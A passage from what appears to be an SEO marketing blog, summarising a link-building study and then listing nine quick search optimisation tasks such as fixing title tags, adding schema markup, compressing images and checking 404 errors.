Indeed, a recent look at Skyscanner’s impressive search rankings revealed something similar. There are quality links there, but plenty which could be classed as ‘low-quality’. Perhaps these are the result of older link building efforts, who knows?

Link volume does not influence ranking

It’s about quality not quantity. As this chart shows, the volume of backlinks does not correlate with ranking.

Variety of linking domains helps

Obvious perhaps, but good to reinforce. A variety of links from different domains matters much more than volume.


Longer content and high rankings

There have been a few studies suggesting a correlation between longer form content and higher search rankings.

It makes sense, as in theory, longer content can be more likely to satisfy the user (it’s detailed, covers key questions etc), and in turn more likely to attract links.

Glen’s data backs this point up. The average word count on all results was 1,762, and higher counts tended to correlate with higher rankings.

word-count-1 (1)

Link building tactics that still work

A few weeks ago, we talked about another finding around sitewide footer links used by some sites, and how tactics like this help the ‘rich get richer’ in search (this was another finding from ViperChill).

In this article, Glen looks at how Houzz uses a widget to mbed dozens of hard-coded links in the websites of those who host it. It seems this tactic is still in use.

Good content still works

Writing quality content to attract links is still an excellent tactic. Evergreen content is key to this.

The example used here is a beginners guide to the Paleo diet, from the nerdfitness blog. It has attracted links from 800 domains and continues to deliver traffic to this day.

paleo diet

Why does it still attract links? Four reasons:

  • High ranking. It’s up there right now, so when people look for resources to link to, there it is.
  • It’s a good article. It’s there because it serves a need. It’s also comprehensive which means people don’t need to look elsewhere.
  • Internal links. The sidebar on the homepage links to the post so it continues to accrue traffic.
  • Loyal audience. The site has an engaged audience who appreciate and link to the content.

Dodgy tactics can still work

There are still plenty of dubious tactics that are helping websites achieve high rankings.

For example, this .info site has 195,000 links from 242 domains, that’s more than 800 per domain. I’m ‘sure’ they’re all earned, natural links though…


The study found less private blog networks than expected, but also finds that they still work.

In summary

I’ve only scratched the surface of the study here, so please check out the full article for much more. It is itself a great example of creating quality (and long-form) content that attracts links. I’m sure we won’t be the only site linking to it.

Nine SEO techniques that take less than 15 minutes

Search Console Search Analytics

I know. It’s the 21st century equivalent of ‘8 minute abs’. But bear with me on this…

Search engine optimisation should be an ongoing process, mixing technical on-page techniques with quality content, good old fashioned marketing, plenty of research, tonnes of planning, masses of testing and all the while taking into account searcher intent, context, algorithm changes… I get breathless just thinking about all the work that needs doing…

Basically, SEO is a job that is never done.

But, if you are struggling with time and resources, there are SEO techniques that don’t have to consume your entire day.

The following can be done while sat down in the morning, enjoying a pastry, listening to some cool light-jazz and blissfully remembering that this is a much better use of your time than that other ‘resolution’ you toyed with doing four paragraphs ago.

Please note: we published a similarly titled guide to quick SEO tips, written by Josh McCoy, way back in 2012. This is an updated, rewritten version that reflects the subsequent changes and updates to the search landscape.

1. Check your site’s organic CTR, revise 10 of the lowest performing page’s title tags and meta descriptions

Head into your site’s Google Search Console, then click on Search Traffic>Search Analytics.

Then click on the Impressions and CTR filters for Pages.

Here you can take a look at the pages with high visibility, but low CTR. Perhaps all they need is an improved meta description or title tag?

For a more detailed overview, check out How to improve CTR using Search Console.

2. Add Schema markup to 10 most popular pages

You can add rich media to your search results by adding Schema markup to the HTML of your pages.

captain america civil war review rich snippet

If you have a particularly massive site with years and years worth of posts, the idea of adding rich snippets to your pages can seem terrifying. Instead, make a spreadsheet of your most popular posts, then every day go through 10 of them and implement schema markup. This should help gradually improve the CTR of your results.

3. Improve your site speed by optimising images

Site speed is a hugely important ranking signal, and you can check your site’s loading time on both mobile and desktop with this new site speed tool.

Obviously improving the performance of your site is a complicated job best saved for the tech team, but you can help…

Images are are by far the ‘heaviest’ element when it comes to page load. So why not spend a few minutes working back through your most popular posts and making your image file sizes smaller.

For example, if there’s an image on your page that’s 1024 x 683 pixels, but the user only sees it at a maximum of 420 x 289, you could ease the strain on your page by compressing the file size with very little noticeable difference.

Read this article for full details: How to optimise your page images to increase site speed.

4. Check the proper canonicalization of your domain

Are you aware that your site may exist in two different places? Without even knowing it, Google could be indexing your content from both and and therefore you may be cannibalising your own pages in search.

Luckily it doesn’t take very long to fix this problem.

You just have to tell Google which is the preferred version of your domain for all future crawls of your site and indexing refreshes.

As it states on their webmaster help page:

If you specify your preferred domain as and we find a link to your site that is formatted as, we follow that link as instead. In addition, we’ll take your preference into account when displaying the URLs.

To change this, visit Search Console, click on your site, click the gear icon then click Site Settings. And in the Preferred domain section, select the option you want.

5. Verify your Google My Business page, make sure your details are up to date

Kevin Gibbons wrote some good suggestions for us when it comes to optimising your page for local search:

  • Claim your listing, as often many people don’t.
  • Ensure your details are up-to-date (previously you might not have accepted credit cards).
  • Double check your opening hours and phone number as these often change over time or the business has new owners or management
  • Check the business images you are using and consider refreshing them or uploading higher res versions.
  • Check no-one has made an edit to your listing and changed the businesses’s website to their affiliate link, have seen this too!

There are loads more tips here: How to optimise your Google My Business listing.

6. Check that you don’t have any duplicate meta description and title tags

This is a very easy one. Just head back into Search Console, click on Search Appearance>HTML Improvements, then you can see exactly which of your pages contain duplicate metadata.

Search Console HTML Improvements

7. Keep on top of your image alt tags

Google Image Search can drive a significant amount of traffic to your site, however you must remember that Google can’t ‘see’ your images, but it can ‘read them’.

Therefor describing your images accurately and concisely in the ‘alt description or tag’ section is something you really need to stay on top of.

Check back through your last handful of pages and make sure your images conform.

wordpress photo upload highlighting caption and description

You could even look at the alt tags at the same time as checking your images’ file sizes (see point 3).

For lots more information, check out How to optimise images for SEO.

8. Check your 404 error codes

404 pages occur when a Googlebot attempts to visit a page that doesn’t exist. Generally 404 pages are fine and won’t harm your rankings, but it is important to pay attention to them, especially if there’s a sudden increase.

You can check these in Search Console, under Crawl>Crawl Errors.

Then if anything looks to have been deleted accidentally, or a 301 redirect hasn’t been put in place properly, you can fix these straight away.

9. Keep on top of your internal linking

Regular and consistent internal linking to the most popular articles on your site is a key way to show search engines that your site has authority and that your content is ‘trusted’.

There are many different methods and tools to check which of your pages is the most popular for any search phrase, and therefore the you can use to internally link for added SEO benefit.

Spend some time going back through your posts and ensuring that each post has a few internal links, paying particular attention to the anchor text used, and making sure they’re all relevant AND pointing towards pages you wish to see rank.

There’s an excellent, detailed best practice guide here: Internal linking for SEO.

So there you go. Nine quick things you can do to improve your SEO every day without taking up too much of your energy. Obviously this is far from an exhaustive list, but it’s definitely a start to getting the basics right.